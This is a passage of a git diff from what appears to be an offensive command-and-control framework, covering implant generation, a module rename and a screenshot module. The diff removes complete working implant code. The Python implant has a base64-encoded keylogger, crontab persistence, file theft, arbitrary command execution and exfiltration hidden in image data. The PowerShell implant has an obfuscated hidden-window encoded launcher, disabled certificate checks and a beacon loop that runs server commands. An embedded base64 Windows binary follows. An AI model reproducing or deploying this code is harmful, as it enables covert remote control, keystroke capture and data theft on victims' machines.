0FnSUNBZ0lDQWdJQ0FnWTNSeWJHTm9ZWElnUFNBaVcyWnVYU0lOQ2lBZ0lDQWdJQ0FnSUNCbGJITmxEUW9nSUNBZ0lDQWdJQ0FnSUNCamRISnNZMmhoY2lBOUlDSWlEUW9nSUNBZ0lDQWdJR1Z1WkEwS0lDQWdJQ0FnSUNCcFppQmpkSEpzWTJoaGNpQTlQU0FpSWlCaGJtUWdZWE5qYVdrZ1BUMGdNQTBLSUNBZ0lDQWdJQ0FnSUd0amFISWdQU0JEWVhKaWIyNHVSMlYwVTJOeWFYQjBWbUZ5YVdGaWJHVW9VMDFmUzBOSVVsOURRVU5JUlN3Z1UwMWZRMVZTVWtWT1ZGOVRRMUpKVUZRcERRb2dJQ0FnSUNBZ0lDQWdZM1Z5Y2w5aGMyTnBhU0E5SUVOaGNtSnZiaTVMWlhsVWNtRnVjMnhoZEdVb2EyTm9jaXdnYXl3Z2MzUmhkR1VwRFFvZ0lDQWdJQ0FnSUNBZ1kzVnljbDloYzJOcGFTQTlJR04xY25KZllYTmphV2tnUGo0Z01UWWdhV1lnWTNWeWNsOWhjMk5wYVNBOElERU5DaUFnSUNBZ0lDQWdJQ0J3Y21WMlgyUnZkMjViYTEwZ1BTQjBjblZsRFFvZ0lDQWdJQ0FnSUNBZ2FXWWdZM1Z5Y2w5aGMyTnBhU0E5UFNBd0RRb2dJQ0FnSUNBZ0lDQWdJQ0JqWVhCZlpteGhaeUE5SUhSeWRXVU5DaUFnSUNBZ0lDQWdJQ0JsYkhObERRb2dJQ0FnSUNBZ0lDQWdJQ0JoYzJOcGFTQTlJR04xY25KZllYTmphV2tOQ2lBZ0lDQWdJQ0FnSUNCbGJtUU5DaUFnSUNBZ0lDQWdaV3h6YVdZZ1kzUnliR05vWVhJZ0lUMGdJaUlOQ2lBZ0lDQWdJQ0FnSUNCd2NtVjJYMlJ2ZDI1YmExMGdQU0IwY25WbERRb2dJQ0FnSUNBZ0lHVnVaQTBLSUNBZ0lDQWdaVzVrRFFvZ0lDQWdaV3h6WlEwS0lDQWdJQ0FnY0hKbGRsOWtiM2R1VzJ0ZElEMGdabUZzYzJVTkNpQWdJQ0JsYm1RTkNpQWdaVzVrRFFvZ0lHbG1JR0Z6WTJscElDRTlJREFnYjNJZ1kzUnliR05vWVhJZ0lUMGdJaUlOQ2lBZ0lDQnBaaUJoY0hCZmJtRnRaU0FoUFNCc1lYTjBWMmx1Wkc5M0RRb2dJQ0FnSUNCd2RYUnpJQ0pjYmx4dVd5TjdZWEJ3WDI1aGJXVjlYU0F0SUZzamUxUnBiV1V1Ym05M2ZWMWNiaUlOQ2lBZ0lDQWdJR3hoYzNSWGFXNWtiM2NnUFNCaGNIQmZibUZ0WlEwS0lDQWdJR1Z1WkEwS0lDQWdJR2xtSUdOMGNteGphR0Z5SUNFOUlDSWlEUW9nSUNBZ0lDQndjbWx1ZENBaUkzdGpkSEpzWTJoaGNuMGlEUW9nSUNBZ1pXeHphV1lnWVhOamFXa2dQaUF6TWlCaGJtUWdZWE5qYVdrZ1BDQXhNamNOQ2lBZ0lDQWdJR01nUFNCcFppQmpZWEJmWm14aFp5QjBhR1Z1SUdGelkybHBMbU5vY2k1MWNHTmhjMlVnWld4elpTQmhjMk5wYVM1amFISWdaVzVrRFFvZ0lDQWdJQ0J3Y21sdWRDQWlJM3RqZlNJTkNpQWdJQ0JsYkhObERRb2dJQ0FnSUNCd2NtbHVkQ0FpV3lON1lYTmphV2w5WFNJTkNpQWdJQ0JsYm1RTkNpQWdJQ0FrYzNSa2IzVjBMbVpzZFhOb0RRb2dJR1Z1WkEwS0lDQkxaWEp1Wld3dWMyeGxaWEFvTUM0d01Ta05DbVZ1WkEwS0RRbz1cJykpIiB8IHJ1YnkgPiAlcyAyPiYxICYnICUgZmlsZW5hbWUpLnJlYWQoKQp0aW1lLnNsZWVwKDEpCg==" - modb64logger = base64.b64decode(b64logger) - modpayload = modb64logger.replace("REPLACEME",filename) - exec(modpayload) - pids = os.popen('ps aux | grep " ruby" | grep -v grep').read() - returnval = "%%s \\r\\nKeylogger started here: %%s" %% (pids, filename) - return returnval - -def dfile(fname): - if fname: - with open(fname, "rb") as image_file: - imgbytes = image_file.read() - return "0000100001" + imgbytes - -def ufile(base64file, fname): - fname = fname.replace('"','') - filebytes = base64.b64decode(base64file) - try: - output_file = open(fname, 'w') - output_file.write(filebytes) - output_file.close() - return "Uploaded file %%s" %% fname - except Exception as e: - return "Error with source file: %%s" %% e - -def sai(delfile=False): - import uuid - filename = "/tmp/%%s.sh" %% (uuid.uuid4().hex) - imfull = base64.b64decode(imbase) - output_file = open(filename, 'w') - output_file.write(imfull) - output_file.close() - import subprocess - returnval = "Ran Start Another Implant - File dropped: %%s" %% filename - p = subprocess.Popen(["sh", filename]) - if delfile: - p = subprocess.Popen(["rm", filename]) - returnval = "Ran Start Another Implant - File removed: %%s" %% filename - return returnval - -def persist(): - import uuid, os - dircontent = "%%s/.%%s" %% (os.environ['HOME'], uuid.uuid4().hex) - os.mkdir(dircontent) - filename = "%%s/%%s_psh.sh" %% (dircontent, uuid.uuid4().hex) - imfull = base64.b64decode(imbase) - output_file = open(filename, 'w') - output_file.write(imfull) - output_file.close() - import subprocess as s - s.call("crontab -l | { cat; echo '* 10 * * * sh %%s'; } | crontab -" %% filename, shell=True) - return "Installing persistence via user crontab everyday at 10am: \\r\\n%%s" %% filename - -def remove_persist(): - import subprocess as s - s.call("crontab -l | { cat; } | grep -v '_psh.sh'| crontab -", shell=True) - return "Removed user persistence via crontab: \\r\\n**must delete files manually**" - -def decrypt_bytes_gzip( key, data): - iv = data[0:16] - aes = get_encryption(key, iv) - data = aes.decrypt( data ) - import StringIO - import gzip - infile = StringIO.StringIO(data[16:]) - with gzip.GzipFile(fileobj=infile, mode="r") as f: - data = f.read() - return data - -while(True): - cstr=time.strftime("%%d/%%m/%%Y",time.gmtime());cstr=time.strptime(cstr,"%%d/%%m/%%Y") - if cstr < kd: - key = "%s" - uri = "%s" - server = "%%s/%%s%%s" %% (serverclean, random.choice(urls), uri) - try: - time.sleep(timer) - ua='%s' - if hh: req=urllib2.Request(server,headers={'Host':hh,'User-agent':ua}) - else: req=urllib2.Request(server,headers={'User-agent':ua}) - res=urllib2.urlopen(req); - html = res.read() - except Exception as e: - E = e - #print "error %%s" %% e - #print html - if html: - try: - returncmd = decrypt( key, html ) - returncmd = returncmd.rstrip('\\0') - - if "multicmd" in returncmd: - - returncmd = returncmd.replace("multicmd","") - returnval = "" - split = returncmd.split("!d-3dion@LD!-d") - - for cmd in split: - if cmd[:10] == "$sleeptime": - timer = int(cmd.replace("$sleeptime = ","")) - elif cmd[:13] == "download-file": - fname = cmd.replace("download-file ","") - returnval = dfile(fname) - elif cmd[:11] == "upload-file": - fullparams = cmd.replace("upload-file ","") - params = fullparams.split(":") - returnval = ufile(params[1],params[0]) - elif cmd[:19] == "install-persistence": - returnval = persist() - elif cmd[:14] == "get-keystrokes": - returnval = keylog() - elif cmd[:18] == "remove-persistence": - returnval = remove_persist() - elif cmd[:19] == "startanotherimplant": - returnval = sai(delfile=True) - elif cmd[:28] == "startanotherimplant-keepfile": - returnval = sai() - elif cmd[:10] == "loadmodule": - module = cmd.replace("loadmodule","") - exec(module) - try: - import sys - import StringIO - import contextlib - - @contextlib.contextmanager - def stdoutIO(stdout=None): - old = sys.stdout - if stdout is None: - stdout = StringIO.StringIO() - sys.stdout = stdout - yield stdout - sys.stdout = old - - with stdoutIO() as s: - exec module - if s.getvalue(): - returnval = s.getvalue() - else: - returnval = "Module loaded" - except Exception as e: - returnval = "Error with source file: %%s" %% e - - elif cmd.startswith("linuxprivchecker"): - args = cmd[len('linuxprivchecker'):].strip() - args = args.split() - pycode_index = args.index('-pycode') - encoded_module = args[pycode_index +1] - args.pop(pycode_index) - args.pop(pycode_index) - pycode = base64.b64decode(encoded_module) - process = ['python', '-c', pycode] - pycode = 'import sys; sys.argv = sys.argv[1:];' + pycode - import subprocess - returnval = subprocess.check_output(['python', '-c', pycode] + args) - - elif cmd[:6] == "python": - module = cmd.replace("python ","") - try: - import sys - import StringIO - import contextlib - - @contextlib.contextmanager - def stdoutIO(stdout=None): - old = sys.stdout - if stdout is None: - stdout = StringIO.StringIO() - sys.stdout = stdout - yield stdout - sys.stdout = old - - with stdoutIO() as s: - exec module - - returnval = s.getvalue() - - except Exception as e: - returnval = "Error with source file: %%s" %% e - - else: - try: - returnval = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True) - except subprocess.CalledProcessError as exc: - returnval = "ErrorCmd: %%s" %% exc.output - - server = "%%s/%%s%%s" %% (serverclean, random.choice(urls), uri) - opener = urllib2.build_opener() - if (len(cmd) > 200): - cmd = cmd[0:200] - postcookie = encrypt(key, cmd) - data = base64.b64decode(random.choice(icoimage)) - dataimage = data.ljust( 1500, '\\0' ) - dataimagebytes = dataimage+(encrypt(key, returnval, gzip=True)) - if hh: req=urllib2.Request(server,dataimagebytes,headers={'Host':hh,'User-agent':ua,'Cookie':"SessionID=%%s" %% postcookie}) - else: req=urllib2.Request(server,dataimagebytes,headers={'User-agent':ua,'Cookie':"SessionID=%%s" %% postcookie}) - res=urllib2.urlopen(req); - response = res.read() - - except Exception as e: - E = e - #print "error %%s" %% e - w = \"\"""" % (self.DomainFrontHeader,self.Sleep, self.AllBeaconImages, self.AllBeaconURLs, self.KillDate, self.PythonImplant, self.Key, self.RandomURI, self.UserAgent) - self.C2Core = """ -$key="%s" -$global:sleeptime = '%s' - -$payloadclear = @" -[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {`$true} -`$s="$s" -`$sc="$sc" -function DEC {${function:DEC}} -function ENC {${function:ENC}} -function CAM {${function:CAM}} -function Get-Webclient {${function:Get-Webclient}} -function Primer {${function:primer}} -`$primer = primer -if (`$primer) {`$primer| iex} else { -start-sleep 1800 -primer | iex } -"@ - -$ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($payloadclear) -$CompressedStream = New-Object IO.MemoryStream -$DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress) -$DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length) -$DeflateStream.Dispose() -$CompressedScriptBytes = $CompressedStream.ToArray() -$CompressedStream.Dispose() -$EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes) -$NewScript = "sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(`"$EncodedCompressedScript`"),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()" -$UnicodeEncoder = New-Object System.Text.UnicodeEncoding -$EncodedPayloadScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($NewScript)) -$payloadraw = "powershell -exec bypass -Noninteractive -windowstyle hidden -e $($EncodedPayloadScript)" -$payload = $payloadraw -replace "`n", "" - -function GetImgData($cmdoutput) { - $icoimage = @(%s) - - try {$image = $icoimage|get-random}catch{} - - function randomgen - { - param ( - [int]$Length - ) - $set = "...................@..........................Tyscf".ToCharArray() - $result = "" - for ($x = 0; $x -lt $Length; $x++) - {$result += $set | Get-Random} - return $result - } - $imageBytes = [Convert]::FromBase64String($image) - $maxbyteslen = 1500 - $maxdatalen = 1500 + ($cmdoutput.Length) - $imagebyteslen = $imageBytes.Length - $paddingbyteslen = $maxbyteslen - $imagebyteslen - $BytePadding = [System.Text.Encoding]::UTF8.GetBytes((randomgen $paddingbyteslen)) - $ImageBytesFull = New-Object byte[] $maxdatalen - [System.Array]::Copy($imageBytes, 0, $ImageBytesFull, 0, $imageBytes.Length) - [System.Array]::Copy($BytePadding, 0, $ImageBytesFull,$imageBytes.Length, $BytePadding.Length) - [System.Array]::Copy($cmdoutput, 0, $ImageBytesFull,$imageBytes.Length+$BytePadding.Length, $cmdoutput.Length ) - $ImageBytesFull -} -function Create-AesManagedObject($key, $IV) { - try { - $aesManaged = New-Object "System.Security.Cryptography.RijndaelManaged" - } catch { - $aesManaged = New-Object "System.Security.Cryptography.AesCryptoServiceProvider" - } - $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC - $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros - $aesManaged.BlockSize = 128 - $aesManaged.KeySize = 256 - if ($IV) { - if ($IV.getType().Name -eq "String") { - $aesManaged.IV = [System.Convert]::FromBase64String($IV) - } - else { - $aesManaged.IV = $IV - } - } - if ($key) { - if ($key.getType().Name -eq "String") { - $aesManaged.Key = [System.Convert]::FromBase64String($key) - } - else { - $aesManaged.Key = $key - } - } - $aesManaged -} - -function Encrypt-String($key, $unencryptedString) { - $bytes = [System.Text.Encoding]::UTF8.GetBytes($unencryptedString) - $aesManaged = Create-AesManagedObject $key - $encryptor = $aesManaged.CreateEncryptor() - $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length); - [byte[]] $fullData = $aesManaged.IV + $encryptedData - #$aesManaged.Dispose() - [System.Convert]::ToBase64String($fullData) -} -function Encrypt-Bytes($key, $bytes) { - [System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream - $gzipStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress) - $gzipStream.Write( $bytes, 0, $bytes.Length ) - $gzipStream.Close() - $bytes = $output.ToArray() - $output.Close() - $aesManaged = Create-AesManagedObject $key - $encryptor = $aesManaged.CreateEncryptor() - $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length) - [byte[]] $fullData = $aesManaged.IV + $encryptedData - $fullData -} -function Decrypt-String($key, $encryptedStringWithIV) { - $bytes = [System.Convert]::FromBase64String($encryptedStringWithIV) - $IV = $bytes[0..15] - $aesManaged = Create-AesManagedObject $key $IV - $decryptor = $aesManaged.CreateDecryptor(); - $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16); - #$aesManaged.Dispose() - [System.Text.Encoding]::UTF8.GetString($unencryptedData).Trim([char]0) -} -function Encrypt-String2($key, $unencryptedString) { - $unencryptedBytes = [system.Text.Encoding]::UTF8.GetBytes($unencryptedString) - $CompressedStream = New-Object IO.MemoryStream - $DeflateStream = New-Object System.IO.Compression.GzipStream $CompressedStream, ([IO.Compression.CompressionMode]::Compress) - $DeflateStream.Write($unencryptedBytes, 0, $unencryptedBytes.Length) - $DeflateStream.Dispose() - $bytes = $CompressedStream.ToArray() - $CompressedStream.Dispose() - $aesManaged = Create-AesManagedObject $key - $encryptor = $aesManaged.CreateEncryptor() - $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length) - [byte[]] $fullData = $aesManaged.IV + $encryptedData - $fullData -} -function Decrypt-String2($key, $encryptedStringWithIV) { - $bytes = $encryptedStringWithIV - $IV = $bytes[0..15] - $aesManaged = Create-AesManagedObject $key $IV - $decryptor = $aesManaged.CreateDecryptor() - $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16) - $output = (New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$unencryptedData)), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd() - $output - #[System.Text.Encoding]::UTF8.GetString($output).Trim([char]0) -} -[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} - -$URI= "%s" -$Server = "$s/%s" -$ServerClean = "$sc" -while($true) -{ - $ServerURLS = "$($ServerClean)","$($ServerClean)" - $date = (Get-Date -Format "dd/MM/yyyy") - $date = [datetime]::ParseExact($date,"dd/MM/yyyy",$null) - $killdate = [datetime]::ParseExact("%s","dd/MM/yyyy",$null) - if ($killdate -lt $date) {exit} - $sleeptimeran = $sleeptime, ($sleeptime * 1.1), ($sleeptime * 0.9) - $newsleep = $sleeptimeran|get-random - if ($newsleep -lt 1) {$newsleep = 5} - start-sleep $newsleep - $URLS = %s - $RandomURI = Get-Random $URLS - $ServerClean = Get-Random $ServerURLS - $G=[guid]::NewGuid() - $Server = "$ServerClean/$RandomURI$G/?$URI" - try { $ReadCommand = (Get-Webclient).DownloadString("$Server") } catch {} - - while($ReadCommand) { - $RandomURI = Get-Random $URLS - $ServerClean = Get-Random $ServerURLS - $G=[guid]::NewGuid() - $Server = "$ServerClean/$RandomURI$G/?$URI" - try { $ReadCommandClear = Decrypt-String $key $ReadCommand } catch {} - $error.clear() - if (($ReadCommandClear) -and ($ReadCommandClear -ne "fvdsghfdsyyh")) { - if ($ReadCommandClear.ToLower().StartsWith("multicmd")) { - $splitcmd = $ReadCommandClear -replace "multicmd","" - $split = $splitcmd -split "!d-3dion@LD!-d" - foreach ($i in $split){ - $RandomURI = Get-Random $URLS - $ServerClean = Get-Random $ServerURLS - $G=[guid]::NewGuid() - $Server = "$ServerClean/$RandomURI$G/?$URI" - $error.clear() - if ($i.ToLower().StartsWith("upload-file")) { - try { - $Output = Invoke-Expression $i | out-string - $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" - if ($ReadCommandClear -match ("(.+)Base64")) { $result = $Matches[0] } - $ModuleLoaded = Encrypt-String $key $result - $Output = Encrypt-String2 $key $Output - $UploadBytes = getimgdata $Output - (Get-Webclient -Cookie $ModuleLoaded).UploadData("$Server", $UploadBytes)|out-null - } catch { - $Output = "ErrorUpload: " + $error[0] - } - } elseif ($i.ToLower().StartsWith("download-file")) { - try { - Invoke-Expression $i | Out-Null - } - catch { - $Output = "ErrorLoadMod: " + $error[0] - } - } elseif ($i.ToLower().StartsWith("loadmodule")) { - try { - $modulename = $i -replace "LoadModule","" - $Output = Invoke-Expression $modulename | out-string - $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" - $ModuleLoaded = Encrypt-String $key "ModuleLoaded" - $Output = Encrypt-String2 $key $Output - $UploadBytes = getimgdata $Output - (Get-Webclient -Cookie $ModuleLoaded).UploadData("$Server", $UploadBytes)|out-null - } catch { - $Output = "ErrorLoadMod: " + $error[0] - } - } else { - try { - $Output = Invoke-Expression $i | out-string - $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" - $StdError = ($error[0] | Out-String) - if ($StdError){ - $Output = $Output + $StdError - $error.clear() - } - } catch { - $Output = "ErrorCmd: " + $error[0] - } - try { - $Output = Encrypt-String2 $key $Output - $Response = Encrypt-String $key $i - $UploadBytes = getimgdata $Output - (Get-Webclient -Cookie $Response).UploadData("$Server", $UploadBytes)|out-null - } catch{} - } - } - } - elseif ($ReadCommandClear.ToLower().StartsWith("upload-file")) { - try { - $Output = Invoke-Expression $ReadCommandClear | out-string - $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" - if ($ReadCommandClear -match ("(.+)Base64")) { $result = $Matches[0] } - $ModuleLoaded = Encrypt-String $key $result - $Output = Encrypt-String2 $key $Output - $UploadBytes = getimgdata $Output - (Get-Webclient -Cookie $ModuleLoaded).UploadData("$Server", $UploadBytes)|out-null - } catch { - $Output = "ErrorUpload: " + $error[0] - } - - } elseif ($ReadCommandClear.ToLower().StartsWith("download-file")) { - try { - Invoke-Expression $ReadCommandClear | Out-Null - } - catch { - $Output = "ErrorLoadMod: " + $error[0] - } - } elseif ($ReadCommandClear.ToLower().StartsWith("loadmodule")) { - try { - $modulename = $ReadCommandClear -replace "LoadModule","" - $Output = Invoke-Expression $modulename | out-string - $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" - $ModuleLoaded = Encrypt-String $key "ModuleLoaded" - $Output = Encrypt-String2 $key $Output - $UploadBytes = getimgdata $Output - (Get-Webclient -Cookie $ModuleLoaded).UploadData("$Server", $UploadBytes)|out-null - } catch { - $Output = "ErrorLoadMod: " + $error[0] - } - - } else { - try { - $Output = Invoke-Expression $ReadCommandClear | out-string - $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" - $StdError = ($error[0] | Out-String) - if ($StdError){ - $Output = $Output + $StdError - $error.clear() - } - } catch { - $Output = "ErrorCmd: " + $error[0] - } - try { - $Output = Encrypt-String2 $key $Output - $UploadBytes = getimgdata $Output - (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null - } catch {} - } - $ReadCommandClear = $null - $ReadCommand = $null - } - break - } -}""" % (self.Key, self.Sleep, self.AllBeaconImages, self.RandomURI, self.RandomURI, self.KillDate, self.AllBeaconURLs) + py_implant_core = open("%s/PyImplant-Core.py" % FilesDirectory, 'r').read() + self.PythonCore = py_implant_core % (self.DomainFrontHeader,self.Sleep, self.AllBeaconImages, self.AllBeaconURLs, self.KillDate, self.PythonImplant, self.Key, self.RandomURI, self.UserAgent) + ps_implant_core = open("%s/PSImplant-Core.ps1" % FilesDirectory, 'r').read() + self.C2Core = ps_implant_core % (self.Key, self.Sleep, self.AllBeaconImages, self.RandomURI, self.RandomURI, self.KillDate, self.AllBeaconURLs) #Add all db elements def display(self): @@ -607,8 +101,8 @@ while($true) new_implant(self.RandomURI, self.User, self.Hostname, self.IPAddress, self.Key, self.FirstSeen, self.FirstSeen, self.PID, self.Proxy, self.Arch, self.Domain, self.Alive, self.Sleep, self.ModsLoaded, self.Pivot, self.Label) def autoruns(self): - new_task("loadmodule Implant-Core.ps1", self.RandomURI) - update_mods("Implant-Core.ps1", self.RandomURI) + new_task("loadmodule Core.ps1", self.RandomURI) + update_mods("Core.ps1", self.RandomURI) result = get_autoruns() if result: autoruns = "" diff --git a/ImplantHandler.py b/ImplantHandler.py index 7ffcc01..7007602 100644 --- a/ImplantHandler.py +++ b/ImplantHandler.py @@ -250,7 +250,7 @@ def startup(printhelp = ""): startup() if "output-to-html" in implant_id.lower(): - generate_table("CompletedTasks") + generate_table("Tasks") generate_table("C2Server") generate_table("Creds") generate_table("Implants") @@ -307,7 +307,7 @@ def startup(printhelp = ""): startup("Updated set-defaultbeacon (Restart C2 Server): %s\r\n" % cmd) if "opsec" in implant_id.lower(): implants = get_implants_all() - comtasks = get_completedtasks() + comtasks = get_tasks() hosts = "" uploads = "" urls = "" @@ -729,9 +729,9 @@ def runcommand(command, randomuri): else: try: - check_module_loaded("Implant-Core.ps1", randomuri) + check_module_loaded("Core.ps1", randomuri) except Exception as e: - print ("Error loading Implant-Core.ps1: %s" % e) + print ("Error loading Core.ps1: %s" % e) run_autoloads(command, randomuri) diff --git a/Modules/Implant-Core.ps1 b/Modules/Core.ps1 similarity index 96% rename from Modules/Implant-Core.ps1 rename to Modules/Core.ps1 index ad44efb..980878c 100644 --- a/Modules/Implant-Core.ps1 +++ b/Modules/Core.ps1 @@ -392,6 +392,10 @@ Function Get-Screenshot $psloadedscreen = $null function Get-ScreenshotAllWindows { + param( + [string] $TaskId + ) + if ($psloadedscreen -ne "TRUE") { $script:psloadedscreen = "TRUE" $ps = "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